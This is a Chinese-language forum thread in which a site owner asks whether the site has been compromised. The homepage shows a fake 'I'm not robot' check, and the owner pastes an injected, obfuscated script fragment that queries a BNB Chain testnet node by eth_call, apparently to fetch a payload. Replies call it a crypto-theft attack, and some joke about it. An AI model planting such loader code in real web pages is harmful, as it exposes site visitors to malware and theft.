shts 发表于 2025-7-25 16:49:42

网站多了段代码,请问这是中毒了吗

访问网站主页莫名其妙 多了个I'm not robot 谷歌验证窗口

查看缓存的HTML页面 发现多了一段 script代码





// 发送 POST 请求到 BSC 测试网节点
const _0x15a0e6 = 'https://data-seed-prebsc-1-s1.bnbchain.org:8545/';
const _0x56f770 = await fetch(_0x15a0e6, {
method: 'POST',
headers: {
    'Accept': 'application/json',
    'Content-Type': 'application/json'
},
body: JSON.stringify({
    method: 'eth_call',// 可能是调用智能合约
    params: [{ to: _0x1d555f, data: '0x...' }],
    id: 97,
    jsonrpc: '2.0'
})
});

请问 这是中毒了吗

whggo 发表于 2025-7-25 17:55:32

从你描述的情况来看,网站确实被恶意篡改了,这很可能是一种加密货币窃取攻击

hxhx 发表于 2025-7-26 00:03:39

包的,被人下毒了

tiansh 发表于 2025-7-26 00:08:44

哈哈,被人当公益用了,反正性能你也用不完,就当做好事了
页: [1]
查看完整版本: 网站多了段代码,请问这是中毒了吗